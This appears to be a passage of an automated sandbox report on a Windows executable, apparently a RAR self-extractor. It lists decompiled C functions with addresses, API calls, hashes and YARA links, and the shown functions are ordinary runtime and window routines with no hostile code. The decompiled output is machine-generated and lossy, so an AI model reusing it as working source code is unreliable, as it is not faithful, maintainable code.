                            • MoveFileW.KERNEL32(?,?), ref: 009E93FC
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                            • String ID: rtmp%d
                            • API String ID: 2111052971-3303766350
                            • Opcode ID: 22ebfa87976d4ca3f00410cbd55905a8b7a7cefca3b99b16d3df7dfe9c7af84d
                            • Instruction ID: faa4e0620d4e6747b68f90c0a9711a003fb84a4138258b2c2ca7e326d7f110ec
                            • Opcode Fuzzy Hash: 22ebfa87976d4ca3f00410cbd55905a8b7a7cefca3b99b16d3df7dfe9c7af84d
                            • Instruction Fuzzy Hash: DB4195759111A8A6DF22EBA2CD44FEE737CAF88381F0044A5B604E3092EB349F45CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0E2ED, Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E00A0E2ED(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
				signed int _v8;
				signed char _v15;
				char _v16;
				void _v24;
				short _v28;
				char _v31;
				void _v32;
				long _v36;
				intOrPtr _v40;
				void* _v44;
				signed int _v48;
				signed char* _v52;
				long _v56;
				int _v60;
				signed int _t78;
				signed int _t80;
				int _t86;
				void* _t94;
				long _t97;
				void _t105;
				void* _t112;
				signed int _t116;
				signed int _t118;
				signed char _t123;
				signed char _t128;
				intOrPtr _t129;
				signed int _t131;
				signed char* _t133;
				intOrPtr* _t135;
				signed int _t136;
				void* _t137;

				_t78 =  *0xa1d668; // 0xda86b1c8
				_v8 = _t78 ^ _t136;
				_t80 = _a8;
				_t118 = _t80 >> 6;
				_t116 = (_t80 & 0x0000003f) * 0x30;
				_t133 = _a12;
				_v52 = _t133;
				_v48 = _t118;
				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0xa40420 + _t118 * 4)) + _t116 + 0x18));
				_v40 = _a16 + _t133;
				_t86 = GetConsoleCP();
				_t135 = _a4;
				_v60 = _t86;
				 *_t135 = 0;
				 *((intOrPtr*)(_t135 + 4)) = 0;
				 *((intOrPtr*)(_t135 + 8)) = 0;
				while(_t133 < _v40) {
					_v28 = 0;
					_v31 =  *_t133;
					_t129 =  *((intOrPtr*)(0xa40420 + _v48 * 4));
					_t123 =  *(_t129 + _t116 + 0x2d);
					if((_t123 & 0x00000004) == 0) {
						if(( *(E00A09474(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
							_push(1);
							_push(_t133);
							goto L8;
						} else {
							if(_t133 >= _v40) {
								_t131 = _v48;
								 *((char*)( *((intOrPtr*)(0xa40420 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
								 *( *((intOrPtr*)(0xa40420 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0xa40420 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
							} else {
								_t112 = E00A0804C( &_v28, _t133, 2);
								_t137 = _t137 + 0xc;
								if(_t112 != 0xffffffff) {
									_t133 =  &(_t133[1]);
									goto L9;
								}
							}
						}
					} else {
						_t128 = _t123 & 0x000000fb;
						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
						_push(2);
						_v15 = _t128;
						 *(_t129 + _t116 + 0x2d) = _t128;
						_push( &_v16);
						L8:
						_push( &_v28);
						_t94 = E00A0804C();
						_t137 = _t137 + 0xc;
						if(_t94 != 0xffffffff) {
							L9:
							_t133 =  &(_t133[1]);
							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
							_v56 = _t97;
							if(_t97 != 0) {
								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
									L19:
									 *_t135 = GetLastError();
								} else {
									_t48 = _t135 + 8; // 0xff76e900
									 *((intOrPtr*)(_t135 + 4)) =  *_t48 - _v52 + _t133;
									if(_v36 >= _v56) {
										if(_v31 != 0xa) {
											goto L16;
										} else {
											_t105 = 0xd;
											_v32 = _t105;
											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
												goto L19;
											} else {
												if(_v36 >= 1) {
													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
													goto L16;
												}
											}
										}
									}
								}
							}
						}
					}
					goto L20;
					L16:
				}
				L20:
				return E009FE203(_t135, _v8 ^ _t136);
			}


































                            0x00a0e2f5
                            0x00a0e2fc
                            0x00a0e2ff
                            0x00a0e307
                            0x00a0e30b
                            0x00a0e317
                            0x00a0e31a
                            0x00a0e31d
                            0x00a0e324
                            0x00a0e32c
                            0x00a0e32f
                            0x00a0e335
                            0x00a0e33b
                            0x00a0e340
                            0x00a0e342
                            0x00a0e345
                            0x00a0e34a
                            0x00a0e354
                            0x00a0e35b
                            0x00a0e35e
                            0x00a0e365
                            0x00a0e36c
                            0x00a0e398
                            0x00a0e3be
                            0x00a0e3c0
                            0x00000000
                            0x00a0e39a
                            0x00a0e39d
                            0x00a0e464
                            0x00a0e470
                            0x00a0e47b
                            0x00a0e480
                            0x00a0e3a3
                            0x00a0e3aa
                            0x00a0e3af
                            0x00a0e3b5
                            0x00a0e3bb
                            0x00000000
                            0x00a0e3bb
                            0x00a0e3b5
                            0x00a0e39d
                            0x00a0e36e
                            0x00a0e372
                            0x00a0e375
                            0x00a0e37b
                            0x00a0e37d
                            0x00a0e380
                            0x00a0e384
                            0x00a0e3c1
                            0x00a0e3c4
                            0x00a0e3c5
                            0x00a0e3ca
                            0x00a0e3d0
                            0x00a0e3d6
                            0x00a0e3e5
                            0x00a0e3eb
                            0x00a0e3f1
                            0x00a0e3f6
                            0x00a0e412
                            0x00a0e485
                            0x00a0e48b
                            0x00a0e414
                            0x00a0e414
                            0x00a0e41c
                            0x00a0e425
                            0x00a0e42b
                            0x00000000
                            0x00a0e42d
                            0x00a0e42f
                            0x00a0e432
                            0x00a0e44b
                            0x00000000
                            0x00a0e44d
                            0x00a0e451
                            0x00a0e453
                            0x00a0e456
                            0x00000000
                            0x00a0e456
                            0x00a0e451
                            0x00a0e44b
                            0x00a0e42b
                            0x00a0e425
                            0x00a0e412
                            0x00a0e3f6
                            0x00a0e3d0
                            0x00000000
                            0x00a0e459
                            0x00a0e459
                            0x00a0e48d
                            0x00a0e49f

                            APIs
                            • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00A0EA62,00000000,00000000,00000000,00000000,00000000,00A03FBF), ref: 00A0E32F
                            • __fassign.LIBCMT ref: 00A0E3AA
                            • __fassign.LIBCMT ref: 00A0E3C5
                            • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 00A0E3EB
                            • WriteFile.KERNEL32(?,00000000,00000000,00A0EA62,00000000,?,?,?,?,?,?,?,?,?,00A0EA62,00000000), ref: 00A0E40A
                            • WriteFile.KERNEL32(?,00000000,00000001,00A0EA62,00000000,?,?,?,?,?,?,?,?,?,00A0EA62,00000000), ref: 00A0E443
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                            • String ID:
                            • API String ID: 1324828854-0
                            • Opcode ID: 709dcf71b7c7a79f7da2a9ad9eed99f752402a0f7ba5e0d1e005cb3140b8eaa8
                            • Instruction ID: 3c114b71eb18995970cb8259c80a59534a21eaf62e865d568ed6aff50d03c71a
                            • Opcode Fuzzy Hash: 709dcf71b7c7a79f7da2a9ad9eed99f752402a0f7ba5e0d1e005cb3140b8eaa8
                            • Instruction Fuzzy Hash: 9651E3B4E002499FCB10CFA8E885AEEBBF9EF09300F14451AEA61E72D1D7319941CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F88BF, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 124memoryCOMMON
                            Download Yara Rule
                            C-Code - Quality: 82%
                            			E009F88BF(void* __edx) {
				void* __ecx;
				void* _t20;
				short* _t24;
				void* _t28;
				signed int _t29;
				intOrPtr _t31;
				intOrPtr* _t38;
				void* _t44;
				void* _t58;
				intOrPtr* _t60;
				short* _t62;
				short* _t64;
				intOrPtr* _t67;
				long _t69;
				void* _t71;
				void* _t72;

				_t58 = __edx;
				_t43 = _t44;
				if( *((intOrPtr*)(_t44 + 0x10)) == 0) {
					return _t20;
				}
				 *(_t71 + 4) =  *(_t71 + 4) & 0x00000000;
				_t60 =  *((intOrPtr*)(_t71 + 0x18));
				 *((char*)(_t71 + 0x1c)) = E009F87A5(_t60);
				_push(0x200 + E00A02B33(_t60) * 2);
				_t24 = E00A02B53(_t44);
				_t64 = _t24;
				if(_t64 == 0) {
					L16:
					return _t24;
				}
				E00A04D7E(_t64, L"<html>");
				E00A066ED(_t64, L"<head><meta http-equiv=\"content-type\" content=\"text/html; charset=");
				E00A066ED(_t64, L"utf-8\"></head>");
				_t72 = _t71 + 0x18;
				_t67 = _t60;
				_t28 = 0x20;
				if( *_t60 != _t28) {
					L4:
					_t29 = E009F1432(_t76, _t67, L"<html>", 6);
					asm("sbb al, al");
					_t31 =  ~_t29 + 1;
					 *((intOrPtr*)(_t72 + 0x14)) = _t31;
					if(_t31 != 0) {
						_t60 = _t67 + 0xc;
					}
					E00A066ED(_t64, _t60);
					if( *((char*)(_t72 + 0x1c)) == 0) {
						E00A066ED(_t64, L"</html>");
					}
					_t79 =  *((char*)(_t72 + 0x1c));
					if( *((char*)(_t72 + 0x1c)) == 0) {
						_push(_t64);
						_t64 = E009F8ACA(_t58, _t79);
					}
					_t69 = 9 + E00A02B33(_t64) * 6;
					_t62 = GlobalAlloc(0x40, _t69);
					if(_t62 != 0) {
						_t13 = _t62 + 3; // 0x3
						if(WideCharToMultiByte(0xfde9, 0, _t64, 0xffffffff, _t13, _t69 - 3, 0, 0) == 0) {
							 *_t62 = 0;
						} else {
							 *_t62 = 0xbbef;
							 *((char*)(_t62 + 2)) = 0xbf;
						}
					}
					L00A02B4E(_t64);
					_t24 =  *0xa1dff8(_t62, 1, _t72 + 0x10);
					if(_t24 >= 0) {
						E009F87DC( *((intOrPtr*)(_t43 + 0x10)));
						_t38 =  *((intOrPtr*)(_t72 + 0xc));
						_t24 =  *((intOrPtr*)( *_t38 + 8))(_t38,  *((intOrPtr*)(_t72 + 0xc)));
					}
					goto L16;
				} else {
					goto L3;
				}
				do {
					L3:
					_t67 = _t67 + 2;
					_t76 =  *_t67 - _t28;
				} while ( *_t67 == _t28);
				goto L4;
			}



















                            0x009f88bf
                            0x009f88c2
                            0x009f88c8
                            0x009f8a04
                            0x009f8a04
                            0x009f88ce
                            0x009f88d5
                            0x009f88e0
                            0x009f88f0
                            0x009f88f1
                            0x009f88f6
                            0x009f88fc
                            0x009f89ff
                            0x00000000
                            0x009f8a00
                            0x009f8909
                            0x009f8914
                            0x009f891f
                            0x009f8924
                            0x009f8927
                            0x009f892b
                            0x009f892f
                            0x009f893a
                            0x009f8942
                            0x009f8949
                            0x009f894b
                            0x009f894d
                            0x009f8951
                            0x009f8953
                            0x009f8953
                            0x009f8958
                            0x009f8964
                            0x009f896c
                            0x009f8972
                            0x009f8973
                            0x009f8978
                            0x009f897a
                            0x009f8982
                            0x009f8982
                            0x009f898e
                            0x009f899a
                            0x009f899e
                            0x009f89a8
                            0x009f89bd
                            0x009f89ca
                            0x009f89bf
                            0x009f89bf
                            0x009f89c4
                            0x009f89c4
                            0x009f89bd
                            0x009f89ce
                            0x009f89dc
                            0x009f89e5
                            0x009f89f0
                            0x009f89f5
                            0x009f89fc
                            0x009f89fc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009f8931
                            0x009f8931
                            0x009f8931
                            0x009f8934
                            0x009f8934
                            0x00000000

                            APIs
                            • GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,?,?,?,?,?,009F87A0), ref: 009F8994
                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 009F89B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: AllocByteCharGlobalMultiWide
                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                            • API String ID: 3286310052-4209811716
                            • Opcode ID: 42f599a5c66bb3bad3b2531ff20f0b44ff64b0aa6d0b6aa30a65761c47c2e188
                            • Instruction ID: 05d9fa1581b64ee71d4f9d4d023a6c9931379cb292b11d6b0c4463197b98c1cb
                            • Opcode Fuzzy Hash: 42f599a5c66bb3bad3b2531ff20f0b44ff64b0aa6d0b6aa30a65761c47c2e188
                            • Instruction Fuzzy Hash: 8431143210430A7ED714AF60AC0AFBB779CDF92320F14851EF610961C1EFB5D94587A6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009F8FE6, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                            Download Yara Rule
                            C-Code - Quality: 43%
                            			E009F8FE6(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E009F8D3F(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00A02B4E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00A0668C(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xa1df88(0,  *0xa1dfd4(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xa1df90( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xa1df98(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xa1dfd4(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xa1df8c( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E009F8E11(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00A02B4E(_t65);
							}
						}
					}
				}
				return _t43;
			}














                            0x009f8fef
                            0x009f8ff3
                            0x009f8ff9
                            0x009f8ffc
                            0x009f8fff
                            0x009f900b
                            0x009f9014
                            0x009f9019
                            0x009f901e
                            0x009f9024
                            0x009f902a
                            0x009f902e
                            0x009f9026
                            0x009f9026
                            0x009f9026
                            0x009f9034
                            0x009f903b
                            0x009f9044
                            0x009f905b
                            0x009f9065
                            0x009f906a
                            0x009f906a
                            0x009f9070
                            0x009f907e
                            0x009f90ab
                            0x009f90b1
                            0x009f90b8
                            0x009f90f2
                            0x009f90f4
                            0x009f90f9
                            0x00000000
                            0x009f9102
                            0x009f90ba
                            0x009f90bc
                            0x009f90c3
                            0x009f90c6
                            0x009f90cd
                            0x009f90d2
                            0x009f90d6
                            0x009f90db
                            0x009f90e3
                            0x00000000
                            0x009f90ef
                            0x009f90d6
                            0x009f90c6
                            0x009f90bc
                            0x009f910e

                            APIs
                            • ShowWindow.USER32(?,00000000), ref: 009F8FFF
                            • GetWindowRect.USER32(?,00000000), ref: 009F9044
                            • ShowWindow.USER32(?,00000005,00000000), ref: 009F90DB
                            • SetWindowTextW.USER32(?,00000000), ref: 009F90E3
                            • ShowWindow.USER32(00000000,00000005), ref: 009F90F9
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: Window$Show$RectText
                            • String ID: RarHtmlClassName
                            • API String ID: 3937224194-1658105358
                            • Opcode ID: c5b0427877ae2c88a1ab06dd875ac6e3a7fc418e226bfe220b4d4b5c83887c89
                            • Instruction ID: 03b75d74904b6f4dbaa9e7502e57ce40ae20a438c0cac369a733190013fd4d88
                            • Opcode Fuzzy Hash: c5b0427877ae2c88a1ab06dd875ac6e3a7fc418e226bfe220b4d4b5c83887c89
                            • Instruction Fuzzy Hash: 0431D331108318EFCB119FA4DC4CFAB7BA8EF48301F048559FA4AA60A6CB35D902CB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A0B506, Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                            Download Yara Rule
                            C-Code - Quality: 100%
                            			E00A0B506(intOrPtr _a4) {
				void* _t18;

				_t45 = _a4;
				if(_a4 != 0) {
					E00A0B4CA(_t45, 7);
					E00A0B4CA(_t45 + 0x1c, 7);
					E00A0B4CA(_t45 + 0x38, 0xc);
					E00A0B4CA(_t45 + 0x68, 0xc);
					E00A0B4CA(_t45 + 0x98, 2);
					E00A07A50( *((intOrPtr*)(_t45 + 0xa0)));
					E00A07A50( *((intOrPtr*)(_t45 + 0xa4)));
					E00A07A50( *((intOrPtr*)(_t45 + 0xa8)));
					E00A0B4CA(_t45 + 0xb4, 7);
					E00A0B4CA(_t45 + 0xd0, 7);
					E00A0B4CA(_t45 + 0xec, 0xc);
					E00A0B4CA(_t45 + 0x11c, 0xc);
					E00A0B4CA(_t45 + 0x14c, 2);
					E00A07A50( *((intOrPtr*)(_t45 + 0x154)));
					E00A07A50( *((intOrPtr*)(_t45 + 0x158)));
					E00A07A50( *((intOrPtr*)(_t45 + 0x15c)));
					return E00A07A50( *((intOrPtr*)(_t45 + 0x160)));
				}
				return _t18;
			}




                            0x00a0b50c
                            0x00a0b511
                            0x00a0b51a
                            0x00a0b525
                            0x00a0b530
                            0x00a0b53b
                            0x00a0b549
                            0x00a0b554
                            0x00a0b55f
                            0x00a0b56a
                            0x00a0b578
                            0x00a0b586
                            0x00a0b597
                            0x00a0b5a5
                            0x00a0b5b3
                            0x00a0b5be
                            0x00a0b5c9
                            0x00a0b5d4
                            0x00000000
                            0x00a0b5e4
                            0x00a0b5e9

                            APIs
                              • Part of subcall function 00A0B4CA: _free.LIBCMT ref: 00A0B4F3
                            • _free.LIBCMT ref: 00A0B554
                              • Part of subcall function 00A07A50: RtlFreeHeap.NTDLL(00000000,00000000,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?), ref: 00A07A66
                              • Part of subcall function 00A07A50: GetLastError.KERNEL32(?,?,00A0B4F8,?,00000000,?,00000000,?,00A0B51F,?,00000007,?,?,00A0B91C,?,?), ref: 00A07A78
                            • _free.LIBCMT ref: 00A0B55F
                            • _free.LIBCMT ref: 00A0B56A
                            • _free.LIBCMT ref: 00A0B5BE
                            • _free.LIBCMT ref: 00A0B5C9
                            • _free.LIBCMT ref: 00A0B5D4
                            • _free.LIBCMT ref: 00A0B5DF
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: _free$ErrorFreeHeapLast
                            • String ID:
                            • API String ID: 776569668-0
                            • Opcode ID: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                            • Instruction ID: eb6165f5bf23fa61136520505f6adad0469b7ac431eb8fac591d35178fe3fa95
                            • Opcode Fuzzy Hash: 47c67bb6ac6dc7fd170de8bd6b40a79d5f713bdac9f6b7190701213f35d3a31d
                            • Instruction Fuzzy Hash: 8F110D72A54B0CAAD660B7B0EE0BFCF779C6F04B00F404815B79E660D3DB7AB6044660
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00A01694, Relevance: 10.6, APIs: 7, Instructions: 60COMMON
                            Download Yara Rule
                            C-Code - Quality: 95%
                            			E00A01694(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0xa1d680 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E00A0288E(__eflags,  *0xa1d680);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E00A028C8(__eflags,  *0xa1d680, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_t29 = E00A07B1B(_t16, 1, 0x28);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E00A028C8(__eflags,  *0xa1d680, 0);
								} else {
									__eflags = E00A028C8(__eflags,  *0xa1d680, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E00A07A50(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}








                            0x00a0169b
                            0x00a016ae
                            0x00a016b5
                            0x00a016b8
                            0x00a016bb
                            0x00a016d4
                            0x00a016d4
                            0x00a016bd
                            0x00a016bd
                            0x00a016bf
                            0x00a016c9
                            0x00a016cf
                            0x00a016d0
                            0x00a016d2
                            0x00a016e2
                            0x00a016e6
                            0x00a016e8
                            0x00a016fc
                            0x00a016fc
                            0x00a01705
                            0x00a016ea
                            0x00a016f8
                            0x00a016fa
                            0x00a0170e
                            0x00a01710
                            0x00a01710
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a016fa
                            0x00a01713
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00a016d2
                            0x00a016bf
                            0x00a0171b
                            0x00a01725
                            0x00a0169d
                            0x00a0169f
                            0x00a0169f

                            APIs
                            • GetLastError.KERNEL32(?,?,00A0168B,009FF0E2), ref: 00A016A2
                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A016B0
                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A016C9
                            • SetLastError.KERNEL32(00000000,?,00A0168B,009FF0E2), ref: 00A0171B
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID: ErrorLastValue___vcrt_
                            • String ID:
                            • API String ID: 3852720340-0
                            • Opcode ID: 98d5a128050c0ff51cc2e90b94bd1042f90ae4926e268881d04c27024adf775f
                            • Instruction ID: e7c806d02b01b371a953fcd76055a96878b69b42eb826dee0351665bdf448175
                            • Opcode Fuzzy Hash: 98d5a128050c0ff51cc2e90b94bd1042f90ae4926e268881d04c27024adf775f
                            • Instruction Fuzzy Hash: 9C01F73661933D5EE7256BB47C896EB2B58EB013B17304739F125550E2EF624C029654
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 009FD27B, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMON
                            Download Yara Rule
                            C-Code - Quality: 77%
                            			E009FD27B() {
				intOrPtr _t1;
				_Unknown_base(*)()* _t3;
				void* _t5;
				_Unknown_base(*)()* _t6;
				struct HINSTANCE__* _t14;

				_t1 =  *0xa3fe58;
				if(_t1 != 1) {
					if(_t1 == 0) {
						_t14 = GetModuleHandleW(L"KERNEL32.DLL");
						if(_t14 != 0) {
							_t3 = GetProcAddress(_t14, "AcquireSRWLockExclusive");
							if(_t3 == 0) {
								goto L5;
							} else {
								 *0xa3fe5c = _t3;
								_t6 = GetProcAddress(_t14, "ReleaseSRWLockExclusive");
								if(_t6 == 0) {
									goto L5;
								} else {
									 *0xa3fe60 = _t6;
								}
							}
						} else {
							L5:
							_t14 = 1;
						}
						asm("lock cmpxchg [edx], ecx");
						if(0 != 0 || _t14 != 1) {
							if(0 != 1) {
								_t5 = 1;
							} else {
								goto L12;
							}
						} else {
							L12:
							_t5 = 0;
						}
						return _t5;
					} else {
						return 1;
					}
				} else {
					return 0;
				}
			}








                            0x009fd27b
                            0x009fd286
                            0x009fd28e
                            0x009fd2a0
                            0x009fd2a4
                            0x009fd2b0
                            0x009fd2b8
                            0x00000000
                            0x009fd2ba
                            0x009fd2c0
                            0x009fd2c5
                            0x009fd2cd
                            0x00000000
                            0x009fd2cf
                            0x009fd2cf
                            0x009fd2cf
                            0x009fd2cd
                            0x009fd2a6
                            0x009fd2a6
                            0x009fd2a6
                            0x009fd2a6
                            0x009fd2dd
                            0x009fd2e3
                            0x009fd2eb
                            0x009fd2f1
                            0x00000000
                            0x00000000
                            0x00000000
                            0x009fd2ed
                            0x009fd2ed
                            0x009fd2ed
                            0x009fd2ed
                            0x009fd2f5
                            0x009fd290
                            0x009fd293
                            0x009fd293
                            0x009fd288
                            0x009fd28b
                            0x009fd28b

                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.326946843.00000000009E1000.00000020.00020000.sdmp, Offset: 009E0000, based on PE: true
                            • Associated: 00000001.00000002.326937806.00000000009E0000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.326997285.0000000000A12000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327019506.0000000000A1D000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327032098.0000000000A24000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327047991.0000000000A40000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.327055575.0000000000A41000.00000002.00020000.sdmp Download File
                            Similarity
                            • API ID:
